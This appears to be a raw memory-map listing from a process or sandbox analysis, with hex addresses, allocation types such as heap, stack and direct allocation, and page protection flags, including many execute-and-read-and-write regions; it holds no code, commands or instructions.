trusted library allocation
page read and write
3630000
direct allocation
page execute and read and write
BD8000
heap
page read and write
A07000
heap
page read and write
7184000
trusted library allocation
page read and write
8B8000
heap
page read and write
3E40000
direct allocation
page execute and read and write
2DE0000
heap
page read and write
7401000
heap
page read and write
CCC000
heap
page read and write
3BA0000
direct allocation
page execute and read and write
3A4000
heap
page read and write
7FD10000
direct allocation
page read and write
4FCE000
stack
page read and write
52FC000
stack
page read and write
2E7F000
stack
page read and write
3A4000
heap
page read and write
7030000
unclassified section
page read and write
57C0000
heap
page read and write
500000
unkown
page execute read
722000
heap
page read and write
6E3000
heap
page read and write
3680000
direct allocation
page execute and read and write
2AB0000
heap
page read and write
76E7000
direct allocation
page read and write
7160000
trusted library allocation
page read and write
3495000
direct allocation
page read and write
2D55000
heap
page read and write
6C4D000
stack
page read and write
7174000
trusted library allocation
page read and write
31E0000
heap
page read and write
A2A000
heap
page read and write
530000
heap
page read and write
2C3C000
stack
page read and write
1DBA000
heap
page read and write
A95000
heap
page read and write
2D3B000
heap
page read and write
6775000
heap
page read and write
3E60000
direct allocation
page execute and read and write
8E000
stack
page read and write
4210000
direct allocation
page execute and read and write
273E000
trusted library allocation
page read and write
7FCA0000
direct allocation
page read and write
34C4000
heap
page read and write
8E2000
heap
page read and write
2D7A000
heap
page read and write
49A0000
heap
page read and write
1FA64B19000
heap
page read and write
722F000
heap
page read and write
2F60000
heap
page read and write
78D0000
trusted library allocation
page read and write
229F000
direct allocation
page read and write
18C000
stack
page read and write
2160000
heap
page read and write
2791000
heap
page read and write
2DAF000
heap
page read and write
2EC3000
heap
page read and write
41B0000
direct allocation
page execute and read and write
3A4000
heap
page read and write
4230000
direct allocation
page execute and read and write
36B0000
direct allocation
page execute and read and write
928D000
stack
page read and write
4C0000
heap
page read and write
4501000
direct allocation
page read and write
710D000
stack
page read and write
104E000
unkown
page read and write
8370000
direct allocation
page execute and read and write
74E000
heap
page read and write
7294000
heap
page read and write
2D98000
heap
page read and write
8CF000
stack
page read and write
5D0000
heap
page read and write
2752000
trusted library allocation
page read and write
9690000
trusted library allocation
page read and write
8130000
trusted library allocation
page read and write
2D3A000
heap
page read and write
224F000
direct allocation
page read and write
C2B000
heap
page read and write
4CAD000
direct allocation
page read and write
3690000
direct allocation
page execute and read and write
17C000
stack
page read and write
4000000
direct allocation
page execute and read and write
791000
heap
page read and write
C0D000
heap
page read and write
91E000
heap
page read and write
640000
heap
page read and write
489F000
stack
page read and write
51E0000
heap
page read and write
454F000
direct allocation
page read and write
34BD000
heap
page read and write
2B4D000
stack
page read and write
2770000
trusted library allocation
page read and write
C28000
heap
page read and write
279B000
heap
page read and write
8BF000
heap
page read and write
1C0000
heap
page read and write
7FE20000
direct allocation
page read and write
86D000
heap
page read and write
1C7000
heap
page read and write
4CA0000
direct allocation
page read and write
93E000
stack
page read and write
34E0000
heap
page read and write
277F000
heap
page read and write
278C000
heap
page read and write
C7D000
trusted library allocation
page execute and read and write
78D0000
trusted library allocation
page read and write
CBD000
heap
page read and write
600000
heap
page read and write
3590000
direct allocation
page execute and read and write
8FCE000
stack
page read and write
2791000
heap
page read and write
2C76000
heap
page read and write
7481000
heap
page read and write
990000
heap
page read and write
504E000
stack
page read and write
3FC0000
direct allocation
page execute and read and write
C88000
heap
page read and write
73F0000
trusted library allocation
page read and write
38F0000
direct allocation
page execute and read and write
358D000
heap
page read and write
2EEF000
stack
page read and write
3A4000
heap
page read and write
1111000
unkown
page read and write
34B3000
heap
page read and write
8130000
trusted library allocation
page read and write
226B000
direct allocation
page read and write
7FD50000
direct allocation
page read and write
3446000
direct allocation
page read and write
2D6F000
stack
page read and write
2F39000
heap
page read and write
263E000
trusted library allocation
page read and write
7427000
heap
page read and write
2E0E000
stack
page read and write
6788000
heap
page read and write
3A4000
heap
page read and write
4BA0000
trusted library allocation
page read and write
5A9000
unkown
page read and write
3960000
direct allocation
page execute and read and write
1834000
heap
page read and write
2B5C000
heap
page read and write
5480000
heap
page read and write
4CDD000
stack
page read and write
74D7000
heap
page read and write
702000
heap
page read and write
8C0000
trusted library allocation
page read and write
544000
heap
page read and write
3A4000
heap
page read and write
90A000
heap
page read and write
27E0000
heap
page read and write
772B000
direct allocation
page read and write
724D000
stack
page read and write
34C4000
heap
page read and write
359B000
heap
page read and write
C25000
heap
page read and write
2F68000
heap
page read and write
5073000
direct allocation
page read and write
8130000
trusted library allocation
page read and write
61E99000
unkown
page readonly
2620000
trusted library allocation
page read and write
401000
unkown
page execute read
456C000
direct allocation
page read and write
4340000
direct allocation
page execute and read and write
78D0000
trusted library allocation
page read and write
2FB0000
heap
page read and write
7A0F000
stack
page read and write
401000
unkown
page execute and read and write
A0F000
stack
page read and write
3A4000
heap
page read and write
8130000
trusted library allocation
page read and write
32F0000
heap
page read and write
903000
heap
page read and write
7294000
heap
page read and write
180D000
heap
page read and write
3497000
heap
page read and write
27AC000
trusted library allocation
page read and write
CA1000
heap
page read and write
C89000
heap
page read and write
791000
heap
page read and write
341C000
direct allocation
page read and write
6F0000
heap
page read and write
3A4000
heap
page read and write
2F45000
heap
page read and write
DC1000
unkown
page execute read
8BB000
heap
page read and write
4F70000
direct allocation
page read and write
2D95000
heap
page read and write
5F0000
remote allocation
page read and write
35A5000
heap
page read and write
4020000
direct allocation
page execute and read and write
C25000
heap
page read and write
2EAF000
heap
page read and write
81CB000
trusted library allocation
page read and write
35B0000
direct allocation
page execute and read and write
4E8E000
stack
page read and write
2FB0000
heap
page read and write
181AB990000
heap
page read and write
3A4000
heap
page read and write
7ED000
heap
page read and write
4330000
direct allocation
page execute and read and write
893E000
stack
page read and write
362000
unkown
page readonly
72B0000
trusted library allocation
page read and write
104E000
unkown
page read and write
500000
heap
page read and write
2F8E000
stack
page read and write
544000
heap
page read and write
3F40000
direct allocation
page execute and read and write
725000
heap
page read and write
8130000
trusted library allocation
page read and write
2EC0000
heap
page read and write
652A000
direct allocation
page read and write
710000
heap
page read and write
81D1000
trusted library allocation
page read and write
3A4000
heap
page read and write
2D6E000
heap
page read and write
35AA000
heap
page read and write
6871000
heap
page read and write
CC4000
heap
page read and write
30C0000
heap
page read and write
71C1000
heap
page read and write
4240000
direct allocation
page execute and read and write
4CFF000
stack
page read and write
6FD000
heap
page read and write
2CDE000
stack
page read and write
3A4000
heap
page read and write
7610000
direct allocation
page read and write
2D88000
heap
page read and write
4290000
direct allocation
page execute and read and write
2B4E000
stack
page read and write
26E6000
direct allocation
page read and write
7182000
trusted library allocation
page read and write
863000
heap
page read and write
3D30000
direct allocation
page execute and read and write
22EA000
direct allocation
page read and write
185B000
heap
page read and write
279B000
heap
page read and write
485E000
stack
page read and write
722F000
heap
page read and write
294F000
stack
page read and write
2D8E000
stack
page read and write
1052000
unkown
page readonly
3107000
heap
page read and write
CD4000
heap
page read and write
2D48000
heap
page read and write
15FC000
stack
page read and write
8B2000
heap
page read and write
111A000
unkown
page write copy
C2B000
heap
page read and write
3F0000
heap
page read and write
5BE000
heap
page read and write
36F8000
direct allocation
page read and write
4D1E000
stack
page read and write
27B2000
trusted library allocation
page read and write
3A4000
heap
page read and write
33BE000
stack
page read and write
279B000
heap
page read and write
C47000
heap
page read and write
2795000
heap
page read and write
22A2000
direct allocation
page read and write
5040000
heap
page read and write
2D33000
heap
page read and write
1116000
unkown
page read and write
544000
heap
page read and write
78D0000
trusted library allocation
page read and write
3A4000
heap
page read and write
3E70000
direct allocation
page execute and read and write
104E000
unkown
page write copy
34C4000
heap
page read and write
359C000
heap
page read and write
2868000
trusted library allocation
page read and write
544000
heap
page read and write
71C2000
heap
page read and write
3F90000
direct allocation
page execute and read and write
36A0000
direct allocation
page execute and read and write
2253000
direct allocation
page read and write
34C4000
heap
page read and write
7182000
trusted library allocation
page read and write
BDE000
heap
page read and write
BD9000
heap
page read and write
5A0000
heap
page read and write
8130000
trusted library allocation
page read and write
7435000
heap
page read and write
869000
heap
page read and write
35A9000
heap
page read and write
34C4000
heap
page read and write
6DE000
heap
page read and write
BDC000
heap
page read and write
544000
heap
page read and write
A16000
heap
page read and write
677D000
heap
page read and write
93DC000
stack
page read and write
3EA0000
direct allocation
page execute and read and write
878000
heap
page read and write
2B5C000
heap
page read and write
71B0000
heap
page read and write
D7E000
stack
page read and write
722F000
heap
page read and write
3A4000
heap
page read and write
262B000
trusted library allocation
page read and write
24F0000
trusted library allocation
page execute and read and write
65BD000
direct allocation
page read and write
544000
heap
page read and write
2C0B000
heap
page read and write
CDC000
heap
page read and write
277D000
heap
page read and write
229B000
direct allocation
page read and write
2F25000
heap
page read and write
111B000
unkown
page readonly
CC4000
heap
page read and write
2660000
trusted library allocation
page read and write
6F3000
heap
page read and write
791000
heap
page read and write
4370000
direct allocation
page execute and read and write
34C4000
heap
page read and write
5EA000
unkown
page readonly
8A7E000
stack
page read and write
2C50000
heap
page read and write
8ED000
heap
page read and write
6778000
heap
page read and write
CD5000
heap
page read and write
508F000
stack
page read and write
2F4E000
stack
page read and write
3200000
remote allocation
page read and write
3A4000
heap
page read and write
74A1000
heap
page read and write
23B0000
direct allocation
page read and write
36EA000
direct allocation
page read and write
43B0000
direct allocation
page execute and read and write
544000
heap
page read and write
4B4F000
stack
page read and write
8FC000
heap
page read and write
7500000
trusted library allocation
page read and write
2680000
trusted library allocation
page read and write
885000
heap
page read and write
8130000
trusted library allocation
page read and write
6FA000
heap
page read and write
32C5000
direct allocation
page read and write
34D0000
direct allocation
page execute and read and write
6DED000
stack
page read and write
544000
heap
page read and write
2170000
direct allocation
page execute and read and write
7160000
trusted library allocation
page read and write
39B0000
direct allocation
page execute and read and write
544000
heap
page read and write
6FD000
heap
page read and write
2D60000
heap
page read and write
A02E000
stack
page read and write
267A000
direct allocation
page read and write
111B000
unkown
page readonly
5FE000
heap
page read and write
5A1000
unkown
page read and write
2797000
heap
page read and write
C2B000
heap
page read and write
5B0000
heap
page read and write
81B0000
trusted library allocation
page read and write
303D000
stack
page read and write
81B0000
trusted library allocation
page read and write
745B000
heap
page read and write
722E000
heap
page read and write
909000
heap
page read and write
2D10000
heap
page read and write
2F21000
heap
page read and write
A05000
heap
page read and write
9C8000
unkown
page execute and read and write
310B000
heap
page read and write
1116000
unkown
page read and write
DC1000
unkown
page execute read
8C0000
heap
page read and write
2EE0000
heap
page read and write
54E000
stack
page read and write
8B0E000
stack
page read and write
78D0000
trusted library allocation
page read and write
3F10000
direct allocation
page execute and read and write
C1C000
heap
page read and write
2E6F000
stack
page read and write
1DB8000
heap
page read and write
9EE000
heap
page read and write
544000
heap
page read and write
35B1000
heap
page read and write
2261000
direct allocation
page read and write
3454000
direct allocation
page read and write
3571000
heap
page read and write
A48000
heap
page read and write
C0D000
heap
page read and write
7D0000
heap
page read and write
A16E000
stack
page read and write
3610000
direct allocation
page execute and read and write
3B0000
heap
page read and write
C8A000
trusted library allocation
page execute and read and write
2D38000
heap
page read and write
2F16000
heap
page read and write
34C4000
heap
page read and write
5651000
heap
page read and write
2BAC000
stack
page read and write
3CC0000
direct allocation
page execute and read and write
722F000
heap
page read and write
2A7E000
stack
page read and write
40B0000
direct allocation
page execute and read and write
2E4E000
stack
page read and write
2D0E000
stack
page read and write
480F000
stack
page read and write
2D7A000
heap
page read and write
CBD000
heap
page read and write
3B60000
direct allocation
page execute and read and write
9D3000
unkown
page execute and read and write
3E10000
direct allocation
page execute and read and write
C64000
trusted library allocation
page read and write
CD5000
heap
page read and write
278E000
trusted library allocation
page read and write
2DBC000
stack
page read and write
709000
heap
page read and write
7FE10000
direct allocation
page read and write
89A000
heap
page read and write
2D55000
heap
page read and write
2ACC000
stack
page read and write
8130000
trusted library allocation
page read and write
8130000
trusted library allocation
page read and write
7413000
heap
page read and write
744A000
heap
page read and write
8C7000
heap
page read and write
1FC000
heap
page read and write
4010000
direct allocation
page execute and read and write
8130000
trusted library allocation
page read and write
360000
unkown
page readonly
C8A000
heap
page read and write
A3AE000
stack
page read and write
A06E000
stack
page read and write
37C0000
direct allocation
page execute and read and write
15D000
stack
page read and write
7150000
trusted library allocation
page read and write
27D0000
heap
page read and write
743E000
heap
page read and write
252F000
stack
page read and write
4DA0000
heap
page read and write
7E0000
heap
page read and write
5F3000
heap
page read and write
307E000
stack
page read and write
7160000
trusted library allocation
page read and write
3C00000
direct allocation
page execute and read and write
8130000
trusted library allocation
page read and write
917000
heap
page read and write
912000
heap
page read and write
1117000
unkown
page write copy
26ED000
direct allocation
page read and write
4C43000
heap
page read and write
29FE000
stack
page read and write
1116000
unkown
page write copy
34C4000
heap
page read and write
38B0000
direct allocation
page execute and read and write
8E5000
heap
page read and write
2F1A000
heap
page read and write
3A4000
heap
page read and write
4260000
direct allocation
page execute and read and write
3A4000
heap
page read and write
CCC000
heap
page read and write
3A4000
heap
page read and write
222F000
direct allocation
page read and write
22D9000
direct allocation
page read and write
1052000
unkown
page readonly
3AC0000
direct allocation
page execute and read and write
34C4000
heap
page read and write
7A6000
heap
page read and write
80F000
heap
page read and write
71C5000
heap
page read and write
904000
heap
page read and write
34C4000
heap
page read and write
544000
heap
page read and write
CDF000
heap
page read and write
881000
unkown
page execute and read and write
345C000
direct allocation
page read and write
3A4000
heap
page read and write
34C4000
heap
page read and write
5686000
heap
page read and write
8FE000
heap
page read and write
71C2000
heap
page read and write
708000
heap
page read and write
544000
heap
page read and write
181AB9D0000
heap
page read and write
2F34000
heap
page read and write
CD5000
heap
page read and write
2761000
heap
page read and write
38C0000
direct allocation
page execute and read and write
CA2000
heap
page read and write
2D68000
heap
page read and write
81B0000
trusted library allocation
page read and write
76EC000
direct allocation
page read and write
8FF000
heap
page read and write
412000
unkown
page read and write
CDD000
heap
page read and write
225D000
direct allocation
page read and write
7A4E000
stack
page read and write
2310000
direct allocation
page execute and read and write
2795000
heap
page read and write
4280000
direct allocation
page execute and read and write
2D7B000
heap
page read and write
2F60000
heap
page read and write
907000
heap
page read and write
3A4000
heap
page read and write
CBC000
heap
page read and write
8A6000
heap
page read and write
7182000
trusted library allocation
page read and write
2BE0000
heap
page read and write
5690000
heap
page read and write
CBC000
heap
page read and write
725000
heap
page read and write
678D000
heap
page read and write
980000
heap
page read and write
4120000
direct allocation
page execute and read and write
1638000
heap
page read and write
71B0000
trusted library allocation
page read and write
3A4000
heap
page read and write
34F0000
direct allocation
page execute and read and write
4E5E000
stack
page read and write
43E0000
direct allocation
page execute and read and write
C30000
heap
page read and write
4F30000
trusted library allocation
page execute and read and write
71D6000
heap
page read and write
7432000
heap
page read and write
484E000
stack
page read and write
7174000
trusted library allocation
page read and write
26A5000
direct allocation
page read and write
CDB000
heap
page read and write
540000
heap
page read and write
8ABF000
stack
page read and write
3623000
heap
page read and write
4800000
heap
page read and write
7443000
heap
page read and write
31CE000
stack
page read and write
639000
heap
page read and write
111A000
unkown
page write copy
224C000
direct allocation
page read and write
7FD1C000
direct allocation
page read and write
4AE000
stack
page read and write
36E000
stack
page read and write
880000
heap
page read and write
1FC000
stack
page read and write
BD5000
heap
page read and write
2D3E000
stack
page read and write
33F2000
direct allocation
page read and write
71C2000
heap
page read and write
4470000
direct allocation
page execute and read and write
44EE000
stack
page read and write
158000
stack
page read and write
74A0000
heap
page read and write
5B6000
unkown
page readonly
8E4000
unkown
page execute and write copy
4510000
heap
page read and write
8B2000
heap
page read and write
CE0000
heap
page read and write
3650000
direct allocation
page execute and read and write
2795000
heap
page read and write
111A000
unkown
page write copy
4DDE000
stack
page read and write
2A8C000
stack
page read and write
5FD000
stack
page read and write
8130000
trusted library allocation
page read and write
81D0000
trusted library allocation
page read and write
3A4000
heap
page read and write
544000
heap
page read and write
53FC000
stack
page read and write
3A4000
heap
page read and write
3C20000
direct allocation
page execute and read and write
71B9000
heap
page read and write
2EAE000
stack
page read and write
6A8000
heap
page read and write
7E6000
heap
page read and write
C2B000
heap
page read and write
50D000
unkown
page write copy
330F000
stack
page read and write
34C4000
heap
page read and write
3452000
direct allocation
page read and write
32C7000
direct allocation
page read and write
7427000
heap
page read and write
8130000
trusted library allocation
page read and write
1117000
unkown
page write copy
33F1000
direct allocation
page read and write
331E000
direct allocation
page read and write
34DB000
heap
page read and write
2B5C000
heap
page read and write
3200000
remote allocation
page read and write
8130000
trusted library allocation
page read and write
CC5000
heap
page read and write
3810000
direct allocation
page execute and read and write
5689000
heap
page read and write
CD1000
heap
page read and write
902000
heap
page read and write
2F3A000
heap
page read and write
7230000
heap
page read and write
378000
unkown
page readonly
347F000
direct allocation
page read and write
8FC000
heap
page read and write
61E9F000
unkown
page readonly
4BBF000
stack
page read and write
19C000
stack
page read and write
6A0000
heap
page read and write
2313000
direct allocation
page read and write
3350000
direct allocation
page read and write
111B000
unkown
page readonly
32F0000
heap
page read and write
71C2000
heap
page read and write
4ECF000
stack
page read and write
5686000
heap
page read and write
3F30000
direct allocation
page execute and read and write
3A70000
direct allocation
page execute and read and write
7FD49000
direct allocation
page read and write
8D6000
heap
page read and write
21E6000
direct allocation
page read and write
576000
heap
page read and write
1730000
heap
page read and write
2F3D000
heap
page read and write
360000
heap
page read and write
544000
heap
page read and write
27C0000
heap
page read and write
3910000
direct allocation
page execute and read and write
1C7000
heap
page read and write
C73000
trusted library allocation
page read and write
2F4F000
stack
page read and write
8130000
trusted library allocation
page read and write
51E000
stack
page read and write
34C4000
heap
page read and write
71BA000
heap
page read and write
8D0000
heap
page read and write
228C000
direct allocation
page read and write
2560000
heap
page read and write
3E20000
direct allocation
page execute and read and write
3411000
direct allocation
page read and write
4F96000
direct allocation
page read and write
570000
heap
page read and write
1C7000
heap
page read and write
35A1000
heap
page read and write
8D4000
heap
page read and write
544000
heap
page read and write
71C4000
heap
page read and write
2F1B000
heap
page read and write
7FF000
heap
page read and write
8130000
trusted library allocation
page read and write
70E000
stack
page read and write
29B0000
heap
page read and write
6F2000
heap
page read and write
646000
heap
page read and write
424F000
stack
page read and write
491F000
stack
page read and write
DC1000
unkown
page execute read
30D7000
heap
page read and write
2755000
trusted library allocation
page read and write
3FD0000
direct allocation
page execute and read and write
2F45000
heap
page read and write
71D6000
heap
page read and write
BF1000
heap
page read and write
32F0000
direct allocation
page execute and read and write
7CF000
heap
page read and write
8790000
trusted library allocation
page read and write
4B4F000
stack
page read and write
1645000
heap
page read and write
74E000
heap
page read and write
71D6000
heap
page read and write
3A4000
heap
page read and write
71C5000
heap
page read and write
7FDBE000
direct allocation
page read and write
37B0000
direct allocation
page execute and read and write
34C4000
heap
page read and write
8130000
trusted library allocation
page read and write
275A000
trusted library allocation
page read and write
4F4F000
stack
page read and write
35AB000
heap
page read and write
3B30000
direct allocation
page execute and read and write
2F22000
heap
page read and write
3390000
heap
page read and write
6870000
heap
page read and write
2C40000
heap
page read and write
7481000
heap
page read and write
7FD70000
direct allocation
page read and write
CDA000
heap
page read and write
22CB000
direct allocation
page read and write
2D95000
heap
page read and write
3A4000
heap
page read and write
A3D000
stack
page read and write
AEE000
stack
page read and write
1052000
unkown
page readonly
2C7F000
stack
page read and write
3A4000
heap
page read and write
2D55000
heap
page read and write
81B0000
trusted library allocation
page read and write
7FC50000
direct allocation
page read and write
8130000
trusted library allocation
page read and write
8FD000
stack
page read and write
61E00000
unkown
page readonly
4460000
direct allocation
page execute and read and write
181AB9D7000
heap
page read and write
359B000
heap
page read and write
67AD000
heap
page read and write
744A000
heap
page read and write
34C4000
heap
page read and write
3571000
heap
page read and write
7DE000
stack
page read and write
740D000
heap
page read and write
7174000
trusted library allocation
page read and write
3A4000
heap
page read and write
19B000
stack
page read and write
CC0000
heap
page read and write
2F25000
heap
page read and write
921000
heap
page read and write
544000
heap
page read and write
7227000
heap
page read and write
1116000
unkown
page write copy
8D0000
trusted library allocation
page read and write
401000
unkown
page execute read
6621000
direct allocation
page read and write
6FD000
heap
page read and write
3D20000
direct allocation
page execute and read and write
8130000
trusted library allocation
page read and write
737000
stack
page read and write
2F1A000
heap
page read and write
3720000
direct allocation
page execute and read and write
544000
heap
page read and write
2F1D000
stack
page read and write
3B80000
direct allocation
page execute and read and write
1756000
heap
page read and write
51D0000
heap
page read and write
3D40000
direct allocation
page execute and read and write
63A000
heap
page read and write
2D5E000
heap
page read and write
9610000
trusted library allocation
page read and write
73C000
heap
page read and write
917000
heap
page read and write
2FAE000
stack
page read and write
37E0000
direct allocation
page execute and read and write
6D0000
heap
page read and write
722E000
heap
page read and write
3130000
heap
page read and write
2D80000
heap
page read and write
277D000
heap
page read and write
36D0000
direct allocation
page execute and read and write
79D000
stack
page read and write
8130000
trusted library allocation
page read and write
722E000
heap
page read and write
91FE000
stack
page read and write
2261000
direct allocation
page read and write
7FE38000
direct allocation
page read and write
71D6000
heap
page read and write
7295000
heap
page read and write
277C000
heap
page read and write
9C000
stack
page read and write
3C90000
direct allocation
page execute and read and write
2D7A000
heap
page read and write
1F5000
heap
page read and write
643000
heap
page read and write
6520000
direct allocation
page read and write
187E000
heap
page read and write
35A0000
direct allocation
page execute and read and write
900D000
stack
page read and write
544000
heap
page read and write
29CF000
stack
page read and write
4574000
direct allocation
page read and write
3620000
heap
page read and write
5B5000
heap
page read and write
6DF000
heap
page read and write
BC0000
heap
page read and write
8BA000
heap
page read and write
71D7000
heap
page read and write
4E1E000
stack
page read and write
8130000
trusted library allocation
page read and write
DC1000
unkown
page execute read
808000
heap
page read and write
8CC000
heap
page read and write
2FD0000
heap
page read and write
2D7A000
heap
page read and write
743C000
heap
page read and write
3E80000
direct allocation
page execute and read and write
CA1000
heap
page read and write
2B8D000
stack
page read and write
279B000
heap
page read and write
A17000
heap
page read and write
3A4000
heap
page read and write
78E000
stack
page read and write
3AF000
stack
page read and write
4430000
direct allocation
page execute and read and write
3A4000
heap
page read and write
8DC000
heap
page read and write
2FC0000
heap
page read and write
7429000
heap
page read and write
7182000
trusted library allocation
page read and write
CD1000
heap
page read and write
2298000
direct allocation
page read and write
88B000
heap
page read and write
DC0000
unkown
page readonly
807D000
stack
page read and write
790E000
stack
page read and write
CD0000
heap
page read and write
A18000
heap
page read and write
3A4000
heap
page read and write
30BE000
stack
page read and write
1117000
unkown
page write copy
7487000
heap
page read and write
544000
heap
page read and write
CC4000
heap
page read and write
2C07000
heap
page read and write
6F2000
heap
page read and write
C1E000
stack
page read and write
544000
heap
page read and write
CD0000
heap
page read and write
8130000
trusted library allocation
page read and write
7FDF8000
direct allocation
page read and write
820000
heap
page read and write
82E000
stack
page read and write
A1F000
stack
page read and write
2D7B000
heap
page read and write
7FD81000
direct allocation
page read and write
47E0000
heap
page read and write
71D6000
heap
page read and write
3F60000
direct allocation
page execute and read and write
C40000
heap
page read and write
3510000
direct allocation
page execute and read and write
3190000
heap
page read and write
1F9000
heap
page read and write
538000
unkown
page readonly
544000
heap
page read and write
544000
heap
page read and write
520000
heap
page read and write
CB0000
trusted library allocation
page read and write
3A4000
heap
page read and write
544000
heap
page read and write
2F35000
heap
page read and write
C92000
trusted library allocation
page read and write
2F10000
heap
page read and write
7294000
heap
page read and write
1FA64970000
heap
page read and write
B00000
heap
page read and write
73EF000
stack
page read and write
CBD000
heap
page read and write
544000
heap
page read and write
7450000
heap
page read and write
343F000
direct allocation
page read and write
57ED000
heap
page read and write
3A4000
heap
page read and write
C50000
trusted library allocation
page read and write
2F39000
heap
page read and write
3A4000
heap
page read and write
651D000
direct allocation
page read and write
504E000
stack
page read and write
449E000
stack
page read and write
7435000
heap
page read and write
2D95000
heap
page read and write
48DE000
stack
page read and write
544000
heap
page read and write
8130000
trusted library allocation
page read and write
34C4000
heap
page read and write
26D0000
direct allocation
page read and write
D3E000
stack
page read and write
CD6000
heap
page read and write
8D3000
heap
page read and write
2AB8000
heap
page read and write
2BB0000
heap
page read and write
3560000
direct allocation
page execute and read and write
8130000
trusted library allocation
page read and write
701000
heap
page read and write
3A4000
heap
page read and write
9EA0000
trusted library allocation
page execute and read and write
7FE00000
direct allocation
page read and write
4400000
direct allocation
page execute and read and write
8130000
trusted library allocation
page read and write
5F0000
remote allocation
page read and write
111B000
unkown
page readonly
3170000
heap
page read and write
8130000
trusted library allocation
page read and write
9DA000
unkown
page execute and read and write
544000
heap
page read and write
8130000
trusted library allocation
page read and write
544000
heap
page read and write
417000
unkown
page read and write
3800000
direct allocation
page execute and read and write
BD0000
heap
page read and write
35A8000
heap
page read and write
534000
unkown
page readonly
544000
heap
page read and write
4080000
direct allocation
page execute and read and write
225A000
direct allocation
page read and write
27A6000
trusted library allocation
page read and write
3A4000
heap
page read and write
40C0000
direct allocation
page execute and read and write
3A4000
heap
page read and write
7297000
heap
page read and write
71C4000
heap
page read and write
263E000
stack
page read and write
8130000
trusted library allocation
page read and write
2380000
heap
page read and write
150000
stack
page read and write
278F000
stack
page read and write
2D66000
heap
page read and write
DC1000
unkown
page execute read
71BA000
heap
page read and write
3A4000
heap
page read and write
81E5000
trusted library allocation
page read and write
8C2000
heap
page read and write
4500000
heap
page read and write
71D7000
heap
page read and write
7294000
heap
page read and write
34C4000
heap
page read and write
36D4000
direct allocation
page read and write
1780000
heap
page read and write
8130000
trusted library allocation
page read and write
4F5F000
stack
page read and write
23B0000
direct allocation
page read and write
330F000
stack
page read and write
725000
heap
page read and write
CBD000
heap
page read and write
3930000
direct allocation
page execute and read and write
8C0000
trusted library allocation
page read and write
A7E000
stack
page read and write
7FD42000
direct allocation
page read and write
2646000
trusted library allocation
page read and write
358F000
heap
page read and write
7FE4D000
direct allocation
page read and write
17DC000
heap
page read and write
44E6000
direct allocation
page read and write
68E000
stack
page read and write
3750000
direct allocation
page execute and read and write
3446000
direct allocation
page read and write
904000
heap
page read and write
2D20000
heap
page read and write
BF1000
heap
page read and write
30FA000
heap
page read and write
9BF000
stack
page read and write
2B4D000
heap
page read and write
4D3E000
stack
page read and write
69B2000
trusted library allocation
page read and write
646000
heap
page read and write
32E1000
direct allocation
page read and write
3D50000
direct allocation
page execute and read and write
1052000
unkown
page readonly
7FDE0000
direct allocation
page read and write
81B0000
trusted library allocation
page read and write
32D5000
direct allocation
page read and write
AC0000
heap
page read and write
81B0000
trusted library allocation
page read and write
8D0000
heap
page read and write
7294000
heap
page read and write
309F000
stack
page read and write
35A5000
heap
page read and write
7FD90000
direct allocation
page read and write
CC4000
heap
page read and write
544000
heap
page read and write
35A1000
heap
page read and write
34C4000
heap
page read and write
3310000
heap
page read and write
3990000
direct allocation
page execute and read and write
3A4000
heap
page read and write
901000
heap
page read and write
7FE40000
direct allocation
page read and write
30DE000
heap
page read and write
3A90000
direct allocation
page execute and read and write
17D4000
heap
page read and write
7FE15000
direct allocation
page read and write
2791000
heap
page read and write
8C5000
heap
page read and write
36E0000
direct allocation
page execute and read and write
74E000
stack
page read and write
2244000
direct allocation
page read and write
2500000
trusted library allocation
page read and write
34BD000
heap
page read and write
274A000
trusted library allocation
page read and write
CC2000
heap
page read and write
8130000
trusted library allocation
page read and write
4580000
direct allocation
page read and write
3A0000
heap
page read and write
39E0000
direct allocation
page execute and read and write
3440000
direct allocation
page read and write
8130000
trusted library allocation
page read and write
104E000
unkown
page read and write
C25000
heap
page read and write
8D9000
heap
page read and write
2EDF000
stack
page read and write
3A80000
direct allocation
page execute and read and write
1DB9000
heap
page read and write
1052000
unkown
page readonly
3A4000
heap
page read and write
1FA000
heap
page read and write
7150000
trusted library allocation
page read and write
73C000
heap
page read and write
34C4000
heap
page read and write
3780000
direct allocation
page execute and read and write
3A4000
heap
page read and write
A6B000
unkown
page execute and read and write
180000
stack
page read and write
8E9000
heap
page read and write
3C80000
direct allocation
page execute and read and write
7419000
heap
page read and write
2B90000
heap
page read and write
3303000
direct allocation
page read and write
181AB970000
heap
page read and write
3BE0000
direct allocation
page execute and read and write
42D0000
direct allocation
page execute and read and write
7174000
trusted library allocation
page read and write
2E2F000
unkown
page read and write
886000
unkown
page execute and read and write
111A000
unkown
page write copy
CC2000
heap
page read and write
74D1000
heap
page read and write
544000
heap
page read and write
3370000
direct allocation
page execute and read and write
29C0000
trusted library allocation
page read and write
CD8000
heap
page read and write
4130000
direct allocation
page execute and read and write
181AB950000
heap
page read and write
74B7000
heap
page read and write
3A4000
heap
page read and write
27B7000
trusted library allocation
page read and write
2510000
heap
page read and write
321F000
stack
page read and write
71B0000
trusted library allocation
page read and write
58E000
stack
page read and write
3A00000
direct allocation
page execute and read and write
2688000
direct allocation
page read and write
250000
heap
page read and write
3A4000
heap
page read and write
34C4000
heap
page read and write
8130000
trusted library allocation
page read and write
2D30000
heap
page read and write
71D7000
heap
page read and write
26DF000
direct allocation
page read and write
544000
heap
page read and write
2B3F000
heap
page read and write
5BC000
heap
page read and write
1A4F000
stack
page read and write
400000
unkown
page readonly
744D000
heap
page read and write
803000
heap
page read and write
4DF3000
heap
page execute and read and write
457B000
direct allocation
page read and write
C8E000
heap
page read and write
CD5000
heap
page read and write
73C000
heap
page read and write
8E2000
heap
page read and write
4BF0000
trusted library allocation
page read and write
2130000
heap
page read and write
9E4000
heap
page read and write
230C000
direct allocation
page read and write
3A4000
heap
page read and write
7370000
heap
page read and write
50A000
unkown
page read and write
915000
unkown
page execute and read and write
111B000
unkown
page readonly
211BDEF000
stack
page read and write
2C9D000
stack
page read and write
3A4000
heap
page read and write
264D000
trusted library allocation
page read and write
544000
heap
page read and write
7E0000
heap
page read and write
497E000
stack
page read and write
9D9000
heap
page read and write
185000
stack
page read and write
8130000
trusted library allocation
page read and write
30FA000
heap
page read and write
544000
heap
page read and write
5AD000
unkown
page read and write
544000
heap
page read and write
1FA64A80000
heap
page read and write
8D7000
heap
page read and write
544000
heap
page read and write
3A4000
heap
page read and write
31C0000
direct allocation
page read and write
3240000
heap
page read and write
4450000
direct allocation
page execute and read and write
6EA000
heap
page read and write
35A5000
heap
page read and write
3BF0000
direct allocation
page execute and read and write
6670000
heap
page read and write
6EC000
heap
page read and write
36F0000
